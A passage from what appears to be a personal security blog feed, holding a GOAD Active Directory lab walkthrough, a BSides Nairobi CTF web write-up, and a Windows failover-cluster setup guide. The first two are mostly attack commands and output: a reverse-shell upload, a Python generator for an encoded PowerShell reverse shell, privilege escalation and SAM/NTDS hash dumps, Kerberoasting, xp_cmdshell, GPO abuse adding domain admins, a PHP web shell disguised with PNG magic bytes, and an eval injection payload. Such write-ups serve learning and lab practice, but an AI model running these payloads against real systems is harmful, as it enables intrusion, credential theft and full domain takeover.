Default-First-Site-Name) |_ssl-date: 2024-11-07T16:30:53+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:winterfell.north.sevenkingdoms.local | Not valid before: 2024-11-07T11:44:09 |_Not valid after: 2025-11-07T11:44:09 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:winterfell.north.sevenkingdoms.local | Not valid before: 2024-11-07T11:44:09 |_Not valid after: 2025-11-07T11:44:09 |_ssl-date: 2024-11-07T16:30:52+00:00; -1s from scanner time. 3389/tcp open ms-wbt-server? |_ssl-date: 2024-11-07T16:30:53+00:00; 0s from scanner time. 
| rdp-ntlm-info: | Target_Name: NORTH | NetBIOS_Domain_Name: NORTH | NetBIOS_Computer_Name: WINTERFELL | DNS_Domain_Name: north.sevenkingdoms.local | DNS_Computer_Name: winterfell.north.sevenkingdoms.local | Product_Version: 10.0.17763 |_ System_Time: 2024-11-07T16:30:48+00:00 | ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local | Not valid before: 2024-11-06T09:17:34 |_Not valid after: 2025-05-08T09:17:34 Service Info: Host: WINTERFELL; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_nbstat: NetBIOS name: WINTERFELL, NetBIOS user: \u0026lt;unknown\u0026gt;, NetBIOS MAC: 08:00:27:7a:a2:fc (Oracle VirtualBox virtual NIC) | smb2-time: | date: 2024-11-07T16:30:47 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required 192.168.0.152\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Site doesn\u0026#39;t have a title (text/html). 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM | ms-sql-ntlm-info: | 192.168.0.152:1433: | Target_Name: NORTH | NetBIOS_Domain_Name: NORTH | NetBIOS_Computer_Name: CASTELBLACK | DNS_Domain_Name: north.sevenkingdoms.local | DNS_Computer_Name: castelblack.north.sevenkingdoms.local | DNS_Tree_Name: sevenkingdoms.local |_ Product_Version: 10.0.17763 | ms-sql-info: | 192.168.0.152:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 |_ssl-date: 2024-11-08T06:28:57+00:00; 0s from scanner time. 
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2024-11-08T06:28:14 |_Not valid after: 2054-11-08T06:28:14 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: NORTH | NetBIOS_Domain_Name: NORTH | NetBIOS_Computer_Name: CASTELBLACK | DNS_Domain_Name: north.sevenkingdoms.local | DNS_Computer_Name: castelblack.north.sevenkingdoms.local | DNS_Tree_Name: sevenkingdoms.local | Product_Version: 10.0.17763 |_ System_Time: 2024-11-07T17:15:22+00:00 |_ssl-date: 2024-11-07T17:15:27+00:00; -2s from scanner time. | ssl-cert: Subject: commonName=castelblack.north.sevenkingdoms.local | Not valid before: 2024-11-06T09:32:35 |_Not valid after: 2025-05-08T09:32:35 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -1s, deviation: 0s, median: -1s |_nbstat: NetBIOS name: CASTELBLACK, NetBIOS user: \u0026lt;unknown\u0026gt;, NetBIOS MAC: 08:00:27:7a:a2:fc (Oracle VirtualBox virtual NIC) | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2024-11-07T17:15:22 |_ start_date: N/A domains - sevenkingdoms.local north.sevenkingdoms.local\n192.168.0.150 - kingslanding.sevenkingdoms.local sevenkingdoms.local\n192.168.0.151 - winterfell.north.sevenkingdoms.local north.sevenkingdoms.local\n192.168.0.152 - castelblack.north.sevenkingdoms.local\nweb server there is a webpage that allows file upload , there are no filters so i upload a .aspx reverse shell payload\nwe get a shell\nThe current user \u0026ldquo;iis apppool\\defaultapppool\u0026rdquo; has the following priviledges SeImpersonatePrivilege\nThis can be exploited using prinspoofer \u0026raquo; here\n1 .\\printspoofer.exe -i -c cmd We are now the user \u0026ldquo;nt authority\\system\u0026rdquo;\nFrom here we can extract the sam.hive and system.hive since we have the full control on the system.\n1 2 3 4 5 6 reg save hklm\\sam .\\sam.hive reg save hklm\\system .\\system.hive From these we 
can get the Administrator ntlm hash that we can use to login\n1 2 3 4 5 6 7 8 9 10 11 12 impacket-secretsdump -sam sam.hive -system system.hive LOCAL [*] Target system bootKey: 0xe58fc6e5f506631517c563ede86bead7 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4363b6dc0c95588964884d7e1dfea1f7::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Cleaning up... We can successfully login via winrm in winterfell.north.sevenkingdoms.local and castleblack.north.sevenkingdoms.local as user Administrator\nThis is an easy way to pwn both machines , ill try to find another way in.\nEnumerate users 1 enum4linux -U 192.168.0.150 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Administrator Guest arya.stark brandon.stark catelyn.stark eddard.stark hodor jeor.mormont jon.snow krbtgt rickon.stark robb.stark samwell.tarly \u0026gt;\u0026gt;\u0026gt; Heartsbane sansa.stark sql_svc vagrant we get one password in the users description\nwe can enumerate users while using the creds to discover more\nWe test for password reuse and to check what services we can access with the creds\n1 crackmapexec winrm -u users.txt -p pass.txt -d north.sevenkingdoms.local 192.168.0.152 --continue-on-success ASREProasting 1 2 3 4 5 6 7 8 9 impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile users.txt [-] User sansa.stark doesn\u0026#39;t have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:f080ed05bd30304fa0bea81ca05405f6$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 $krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:11e9b0e6b849834048f19d77ffaab958$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 We can 
try to crack the hashes with hashcat\n1 2 hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt we get \u0026ldquo;brandon.stark : iseedeadpeople\u0026rdquo;\nKERBEroasting 1 2 3 4 5 impacket-GetUserSPNs -dc-ip 192.168.0.151 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -request $krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/jon.snow*$1d34574ce34accafda00ef02b9da270f$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 $krb5tgs$23$*sql_svc$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/sql_svc*$84792126b6065b19368a23f2d3f946f0$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 we get password \u0026ldquo;jon.snow : iknownothing\u0026rdquo;\nThis user can login via RDP on winterfell and MQSQL on castleblack\n1 2 3 4 5 crackmapexec mssql castleblack.north.sevenkingdoms.local -u jon.snow -p iknownothing -d north.sevenkingdoms.local MSSQL castleblack 1433 None [*] None (name:castleblack.north.sevenkingdoms.local) (domain:north.sevenkingdoms.local) MSSQL castleblack 1433 None [+] north.sevenkingdoms.local\\jon.snow:iknownothing (Pwn3d!) 
MSSQL 1 2 impacket-mssqlclient -windows-auth north.sevenkingdoms.local/jon.snow:iknownothing@192.168.0.152 Checking impersonation abilities\n1 2 3 4 5 6 7 8 9 10 11 execute as database permission_name state_desc grantee grantor ---------- -------- --------------- ---------- ------------------- ---------------------------- b\u0026#39;USER\u0026#39; master IMPERSONATE GRANT NORTH\\arya.stark dbo b\u0026#39;USER\u0026#39; msdb IMPERSONATE GRANT NORTH\\arya.stark dbo b\u0026#39;USER\u0026#39; msdb IMPERSONATE GRANT dc_admin MS_DataCollectorInternalUser b\u0026#39;LOGIN\u0026#39; b\u0026#39;\u0026#39; IMPERSONATE GRANT NORTH\\samwell.tarly sa b\u0026#39;LOGIN\u0026#39; b\u0026#39;\u0026#39; IMPERSONATE GRANT NORTH\\brandon.stark NORTH\\jon.snow A “Login” grants the principal entry into the SERVER A “User” grants a login entry into a single DATABASE User \u0026ldquo;samwell.tarly\u0026rdquo; can impersonate login of \u0026ldquo;sa\u0026rdquo;, so we have to login to mssql as samwell first and then run.\n1 2 3 4 exec_as_login sa enable_xp_cmdshell xp_cmdshell whoami from here we can get a reverse shell as user sql_svc\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 #!/usr/bin/env python import base64 import sys if len(sys.argv) \u0026lt; 3: print(\u0026#39;usage : %s ip port\u0026#39; % sys.argv[0]) sys.exit(0) payload=\u0026#34;\u0026#34;\u0026#34; $c = New-Object System.Net.Sockets.TCPClient(\u0026#39;%s\u0026#39;,%s); $s = $c.GetStream();[byte[]]$b = 0..65535|%%{0}; while(($i = $s.Read($b, 0, $b.Length)) -ne 0){ $d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i); $sb = (iex $d 2\u0026gt;\u0026amp;1 | Out-String ); $sb = ([text.encoding]::ASCII).GetBytes($sb + \u0026#39;ps\u0026gt; \u0026#39;); $s.Write($sb,0,$sb.Length); $s.Flush() }; $c.Close() \u0026#34;\u0026#34;\u0026#34; % (sys.argv[1], sys.argv[2]) byte = payload.encode(\u0026#39;utf-16-le\u0026#39;) b64 = base64.b64encode(byte) print(\u0026#34;powershell -exec bypass -enc 
%s\u0026#34; % b64.decode()) Bloodhound 1 bloodhound-python -u brandon.stark -p iseedeadpeople -d north.sevenkingdoms.local -c all -dc winterfell.north.sevenkingdoms.local -ns 192.168.0.151 Here we can mark the high value targets and the users that we have compromised. Bloodhound is useful to get a visual representation of the active directory environment.\nPrivilege escalation We can modify the GPO \u0026quot;\u0026quot; as user samwell.tarly\nHere we willl utilize a tool pygpoabuse\nWe need to get the gpoid , this can be done by loggin in via rdp as jon.snow and running\n1 Get-GPO -All -Domain \u0026#39;north.sevenkingdoms.local\u0026#39; Then\u0026hellip;\n1 2 pygpoabuse.py north.sevenkingdoms.local/samwell.tarly -gpo-id 848cf9d5-81b3-49d6-b628-d8fbcc1a322c This creates an admin user called \u0026ldquo;john\u0026rdquo; with the password \u0026ldquo;H4x00r123..\u0026rdquo;\nWe can now login via winrm\n1 2 3 4 SMB 192.168.0.151 5986 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) HTTP 192.168.0.151 5986 WINTERFELL [*] https://192.168.0.151:5986/wsman WINRM 192.168.0.151 5986 WINTERFELL [+] north.sevenkingdoms.local\\john:H4x00r123.. (Pwn3d!) Using crackmap exec smb and the new user\n1 crackmapexec smb 192.168.0.151 -u john -p \u0026#34;H4x00r123..\u0026#34; --lsa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 B 192.168.0.151 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) SMB 192.168.0.151 445 WINTERFELL [+] north.sevenkingdoms.local\\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) 
SMB 192.168.0.151 445 WINTERFELL [+] Dumping LSA secrets SMB 192.168.0.151 445 WINTERFELL NORTH\\WINTERFELL$:aes256-cts-hmac-sha1-96:9b9cfb7bc4b4696ac33184f5aef050c90c18bf5c5bbdc9dadbe0e538d401e205 SMB 192.168.0.151 445 WINTERFELL NORTH\\WINTERFELL$:aes128-cts-hmac-sha1-96:939fc4f35f4894dca4328d7a1788b7ee SMB 192.168.0.151 445 WINTERFELL NORTH\\WINTERFELL$:des-cbc-md5:1680497f851ad66d SMB 192.168.0.151 445 WINTERFELL NORTH\\WINTERFELL$:plain_password_hex:81ba3b085654dc44a1ede7ea006e2330b869f885bb76d6ab9b9bf959a24835a4521407345d840c9e3708abbd8730822260734914769732e031d0fd7c3a3c71438b3da91460cde8ee884c8de619df6c8bf88c7040e1af0b552dd4aa01a9b1ba5cda63d6a11d54d7044f5a14bdd3263812850cb5184a3456c27ef083e7da3fd1143d814beeaa3adabc0a81e53eb0606dc151421cb756eed4c52a108f22f160d18e761642e1f66effc5fdb5ba3e01720c527d05cd1a24a7b8557579980b5757862c82168b0abbbc89aec55414e741e6252a03acd29acea1ae9b5fb933f2fb6ca9e838e0395cb84e19a10b3ffcd3e3409c92 SMB 192.168.0.151 445 WINTERFELL NORTH\\WINTERFELL$:aad3b435b51404eeaad3b435b51404ee:9d473a58231037f6c63b9c7f0d50c61f::: SMB 192.168.0.151 445 WINTERFELL NORTH\\robb.stark:sexywolfy SMB 192.168.0.151 445 WINTERFELL dpapi_machinekey:0x2156559686eeb6fd6e9116a6dbb58d11e61c87b4 dpapi_userkey:0x802f741bb0b27e5f5fef3b7bc549bac02f4fa528 SMB 192.168.0.151 445 WINTERFELL NL$KM:223401760170309388a76bb2874359690e41bd220a0ccc233a5bb674cb90d63514cad8454af0db72d5cf3ba1ed7f3a98cd4dd6366a35242da0eb0f8e3f5281c9 SMB 192.168.0.151 445 WINTERFELL [+] Dumped 8 LSA secrets to /home/kali/.cme/logs/WINTERFELL_192.168.0.151_2024-11-08_120932.secrets and /home/kali/.cme/logs/WINTERFELL_192.168.0.151_2024-11-08_120932.cached 1 crackmapexec smb 192.168.0.151 -u john -p \u0026#34;H4x00r123..\u0026#34; --ntds 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 SMB 192.168.0.151 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) SMB 192.168.0.151 445 WINTERFELL [+] 
north.sevenkingdoms.local\\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) SMB 192.168.0.151 445 WINTERFELL [+] Dumping the NTDS, this could take a while so go grab a redbull... SMB 192.168.0.151 445 WINTERFELL Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: SMB 192.168.0.151 445 WINTERFELL Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 192.168.0.151 445 WINTERFELL krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3e1aa23cbaaed62c05427ff7148c04d8::: SMB 192.168.0.151 445 WINTERFELL vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: SMB 192.168.0.151 445 WINTERFELL arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709::: SMB 192.168.0.151 445 WINTERFELL eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8::: SMB 192.168.0.151 445 WINTERFELL catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5::: SMB 192.168.0.151 445 WINTERFELL robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a::: SMB 192.168.0.151 445 WINTERFELL sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:2c643546d00054420505a2bf86d77c47::: SMB 192.168.0.151 445 WINTERFELL brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129::: SMB 192.168.0.151 445 WINTERFELL rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560::: SMB 192.168.0.151 445 WINTERFELL hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e::: SMB 192.168.0.151 445 WINTERFELL jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755::: SMB 192.168.0.151 445 WINTERFELL samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843::: SMB 192.168.0.151 445 WINTERFELL jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664::: SMB 192.168.0.151 445 WINTERFELL 
sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804::: SMB 192.168.0.151 445 WINTERFELL WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:9d473a58231037f6c63b9c7f0d50c61f::: SMB 192.168.0.151 445 WINTERFELL CASTELBLACK$:1105:aad3b435b51404eeaad3b435b51404ee:1540ceefdcd5c9e64384ea6796bcd3b4::: SMB 192.168.0.151 445 WINTERFELL krbrelay$:1122:aad3b435b51404eeaad3b435b51404ee:0eddedc35eb7b7ecde0c9f0564e54c83::: SMB 192.168.0.151 445 WINTERFELL SEVENKINGDOMS$:1104:aad3b435b51404eeaad3b435b51404ee:02f4f0cba0ec04eae62a64df80330594::: SMB 192.168.0.151 445 WINTERFELL [+] Dumped 20 NTDS hashes to /home/kali/.cme/logs/WINTERFELL_192.168.0.151_2024-11-08_121039.ntds of which 16 were added to the database 1 crackmapexec smb 192.168.0.151 -u john -p \u0026#34;H4x00r123..\u0026#34; --sam 1 2 3 4 5 6 7 8 TERFELL [+] north.sevenkingdoms.local\\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) SMB 192.168.0.151 445 WINTERFELL [+] Dumping SAM hashes SMB 192.168.0.151 445 WINTERFELL Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: SMB 192.168.0.151 445 WINTERFELL Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 192.168.0.151 445 WINTERFELL DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ERROR:root:SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn\u0026#39;t have hash information. 
SMB 192.168.0.151 445 WINTERFELL [+] Added 3 SAM hashes to the database We also get another plaintext creds \u0026lsquo;NORTH\\robb.stark:sexywolfy\u0026rsquo;\nChecking this use on Bloodhound we can see that there is a path to domain admin.\nTHe user has generic all , so we can add ourselves to domain admin group\n1 2 net group \u0026#34;Domain Admins\u0026#34; john /add /domain From here we can login to the domain controller\nAnd we pwn the north :)\n","date":"2024-11-08T14:33:30+03:00","permalink":"https://f0rk3b0mb.github.io/p/goad-light/","title":"GOAD LIGHT"},{"content":"Bsides Nairobi Cyberchallenge 2024 writeup This is a writeup for the web challenges in Bsides Nairobi Cyberchallenge held physically at Strathmore university, Nairobi\nMy team p3rf3ctr00t won , for the second year in a row. :)\nWeb category Mr donor Here we are given a wordpress site. With donation forms.\nSo first things first, i use wpscan to enumerate the site. There isint alot of content.\n1 2 3 4 use this to enumerate the users wpscan --url http://3.85.212.227/ -e u we get one user - admin_magharibi\nFrom the scan we can also see that there is a plugin called \u0026ldquo;give\u0026rdquo; version 3.41.0\nLooking on the internet we can see that it is vulnerable to CVE-2024-5932 so we can achieve code execution.\nI used this exploit \u0026raquo; here\nIn the shell we can see that there are 3 users\nbackup_svc ctfroom ubuntu checking the contents of wp-config.php\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 /** Database username */ define( \u0026#39;DB_USER\u0026#39;, \u0026#39;wordpressuser\u0026#39; ); /** Database password */ define( \u0026#39;DB_PASSWORD\u0026#39;, \u0026#39;roomctfpassword\u0026#39; ); /** Database hostname */ define( \u0026#39;DB_HOST\u0026#39;, \u0026#39;localhost\u0026#39; ); /** Database charset to use in creating database tables. 
*/ define( \u0026#39;DB_CHARSET\u0026#39;, \u0026#39;utf8\u0026#39; ); /** The database collate type. Don\u0026#39;t change this if in doubt. */ define( \u0026#39;DB_COLLATE\u0026#39;, \u0026#39;\u0026#39; ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define(\u0026#39;AUTH_KEY\u0026#39;, \u0026#39;\u0026amp;p`1\u0026amp;)?\u0026gt;Qk=gl`- GRBr^tuc~=M?CSa^jx *?9Tk`+pj?fndQg{\u0026amp;|~SUtf8+K9FN\u0026#39;); define(\u0026#39;SECURE_AUTH_KEY\u0026#39;, \u0026#39;Okb-xgA4s`znPZ7?gxIdM$)kQFHcvskp\u0026amp; )K67 -YM_rftdk#:0.0B}}q?VaK\u0026lt;z\u0026lt;\u0026#39;); define(\u0026#39;LOGGED_IN_KEY\u0026#39;, \u0026#39;%3$eB%Ne%]s1= `I{5vOs2? EBbn@\u0026amp;{|\u0026gt;.sO?is~XzAN%\u0026lt;O*x-}*k+v}@Xg9RMrD\u0026#39;); define(\u0026#39;NONCE_KEY\u0026#39;, \u0026#39;$#JLk_v+0T6?i)[sJ(Q#f--bsbIO`KS(\u0026gt;}Foz55T|QU-;+L_7sqr{7oEj/m$_.yF\u0026#39;); define(\u0026#39;AUTH_SALT\u0026#39;, \u0026#39;EdGSntZ*0j\u0026gt;pc\u0026lt;^-l^1q`6o^Yf]s|\u0026amp;2BI t|1nwes:i\u0026lt;$jLx*1tJ1~5p)C(}|U-k\u0026#39;); define(\u0026#39;SECURE_AUTH_SALT\u0026#39;, \u0026#39;+O%(gn.H`zB)znBcp^TR#5EjM`(C\u0026gt;\u0026amp;wX|BGD#rJX?v#bU;OLEzdeoD`.c1_i`Svo\u0026#39;); define(\u0026#39;LOGGED_IN_SALT\u0026#39;, \u0026#39;G5x3@)Uw`++abxv sAMrkZtS*`87cfDX\u0026gt;bh-L|SIN!/bZV*^[wC+] nyLP\u0026lt;e6JY]\u0026#39;); define(\u0026#39;NONCE_SALT\u0026#39;, \u0026#39;MXp}(a| 7+TGK9-f2-a9*7@Xv}$6h-N\u0026lt;Z13a@_KlF+|Ugo-3\u0026lt;jHcX\u0026lt;WO[hy?XG ]\u0026#39;); We can login to the database and read the wordpress users and their passwords. 
I found the following hash for admin_magharibi: $P$BHFeuYRoSbViPBhP11FqGR0OQ.6N981.\nI started cracking it in the background while i looked around.\nChecking the crontab\u0026hellip;\n1 0 0 * * 0 sshpass -p \u0026#39;vnG^W6q%zjt^S\u0026#39; ssh -o StrictHostKeychecking=no -o UserKnownHostsFile=/dev/null backup_svc@127.0.0.1 \u0026#34;cp -R /var/www/wordpress /wp_backup\u0026#34; as you can see teh backup_svc user password is exposed.\nLogin via ssh as backup_svc, checking what the user can run as sudo\u0026hellip;\n1 2 3 4 sudo -l we see that the can run any command as sudo without sudo password We get bash shell ad read the flag\n372ae41683bd87573a4902d1ed2d58ad\nPixel Blunder This challenge gave a web interface with a file upload functionality. Seeing this it should click immediately that we are testing file upload vulnerabilities.\nThe site was checking if the image was valid through the magic bytes.\nSo we need to craft a php shell with png magic bytes.\n1 \u0026lt;?php system($_GET[\u0026#39;cmd\u0026#39;]);?\u0026gt; You can use a full php reverseshell as the payload , i use this since ive mastered it offhead.\nAdd magic bytes at it now identifies as a png, ill leave the python script below for future reference\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 import argparse import os def add_hex_to_file(file_path, hex_string, position): # Convert hex string to bytes hex_data = bytes.fromhex(hex_string) # Read the original file content with open(file_path, \u0026#39;rb\u0026#39;) as f: original_content = f.read() # Modify content based on the specified position if position == \u0026#34;start\u0026#34;: modified_content = hex_data + original_content elif position == \u0026#34;end\u0026#34;: modified_content = original_content + hex_data elif position.isdigit(): offset = int(position) modified_content = original_content[:offset] + hex_data + original_content[offset:] else: raise 
ValueError(\u0026#34;Invalid position. Use \u0026#39;start\u0026#39;, \u0026#39;end\u0026#39;, or an integer for custom offset.\u0026#34;) # Write the modified content back to the file with open(file_path, \u0026#39;wb\u0026#39;) as f: f.write(modified_content) print(f\u0026#34;Hex data added to {file_path} at position: {position}\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: parser = argparse.ArgumentParser(description=\u0026#34;Add hex data to a file at a specified position.\u0026#34;) parser.add_argument(\u0026#34;file\u0026#34;, help=\u0026#34;Path to the file to modify.\u0026#34;) parser.add_argument(\u0026#34;hex\u0026#34;, help=\u0026#34;Hex string to add.\u0026#34;) parser.add_argument(\u0026#34;position\u0026#34;, help=\u0026#34;Position to add hex data (\u0026#39;start\u0026#39;, \u0026#39;end\u0026#39;, or an integer for a custom offset).\u0026#34;) args = parser.parse_args() if not os.path.isfile(args.file): print(\u0026#34;File not found.\u0026#34;) else: add_hex_to_file(args.file, args.hex, args.position) Uploading the file we still get nothing.\nThere is still one more step\u0026hellip;.\nUploading the file the file-extension is stripped and if you know a php web server , it will not try to parse anyfile that doesnt have the proper php file extension.\nTHe trick for this is to use two extensions so that it strips one and leaves the other like \u0026ldquo;shell.php.php\u0026rdquo;\nWe get a shell and read the /flag.txt\nflag{7512a04d-5acd-45d9-b7ba-89467f2ba4ec}\nFaceoff In this challenge we are given a login page, username and password are admin:admin123 , my team mate got these from wherever.\nI solved this challenge ten minutes to time so i might not explain properly how i did this.\nAfter loggin in with the creds we are provided with a black page. Looking at the backend we can see that it uses flask . TIP: if you ever see flask in the backend most probably there is SSTI. 
So you have to look for user controlled input that is being diplayed in the page.\nThere was a hint for the chal , so i used the word \u0026ldquo;bsides\u0026rdquo; as a parameter\n1 2 http://3.88.113.117/do_something?bsides=\u0026lt;here goes your payload\u0026gt; Trying ssti payloads will give this error\n1 You have said: Error: unhashable type: \u0026#39;set I googled it and saw it was caused by python eval(). So we can get code execution by using the payload below\n1 http://3.88.113.117/do_something?bsides=__import__(\u0026#39;os\u0026#39;).system(\u0026#39;id\u0026#39;) Slap a reverse shell and you are good to go.\nThe flag wa hidden in \u0026ldquo;do_something/secret\u0026rdquo; , this i learnt after reading app.py file. Was lucky to get this 2 minutes before time\nflag: D0nt_4get_to_wear_Y0r_reflective_j4ck37s\n","date":"2024-10-26T17:13:14+03:00","image":"https://f0rk3b0mb.github.io/cover/perfect.png","permalink":"https://f0rk3b0mb.github.io/p/bsidesnrb2024/","title":"BsidesNrb2024"},{"content":"Windows Server High Availability Setup Part2\nCheck out part 1 \u0026raquo; here to be able to proceed to this stage\n1. Windows Server High Availability Setup of Roles Youll need to create a iscsi virtual hard disk through the domain controller and add it to the cluster , that step is in part 1\nMy disk is \u0026ldquo;cluster disk 1\u0026rdquo;\nFor this demonstration im going to make nginx web server application persistent across the nodes. So i copied nginx files to the cluster disk.\nThen create a role with the executable path and parameters start the nginx server\nGo to roles in failover cluster manager applucation and create an empty role. Then add resource in this case is a generic application. You can add services and native processes or even containers of you want those to be persistent.\nThen confirm, ensure the role is up with no errors.\nWith that we have configured nginx to be persistent across nodes. 
If you turn off node 1 it will be started in node 2 with all the data persistent across the nodes.\nFrom there you can setup the networking part of your appplication to ensure they can be accessed from other endpoints.\n","date":"2024-07-01T09:38:06+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows_server_high_availability_cluster_part2/","title":"Windows_server_high_availability_cluster_part2"},{"content":"Windows Server High Availability Setup\n1 2 A failover cluster is a group of independent computers that work together to increase the availability and scalability of clustered roles (formerly called clustered applications and services). The clustered servers (called nodes) are connected by physical cables and by software. If one or more of the cluster nodes fail, other nodes begin to provide service (a process known as failover). In addition, the clustered roles are proactively monitored to verify that they are working properly. If they are not working, they are restarted or moved to another node. Here we are going to setup iscsi disks and a cluster with 2 node servers.\nThe disk can be physical or virtual , for this tutorial im going to use a virtual harddisk.\nYou will also need:\nvmware workstation 3 windows server operation systems (im using 2022) 1. Install required components We will need the following components:\nFile Server Iscsi Target Server Failover Clustering Active Directory Domain Services 2 setup Domain Controller Create a domain server and add the other 2 vms to the domain\nfollow this tutorials here to do the same \u0026raquo;\nsetup DC\nadd computer to domain\n1 2 3 4 5 6 7 Before you begin you have to set the dns server that can resolve the dc domain name in the network settings. For this instance the dns is the same as the ip of the DC controller. This will enable the other device to access the domain pingpong.local without need of specifying the ip address. 
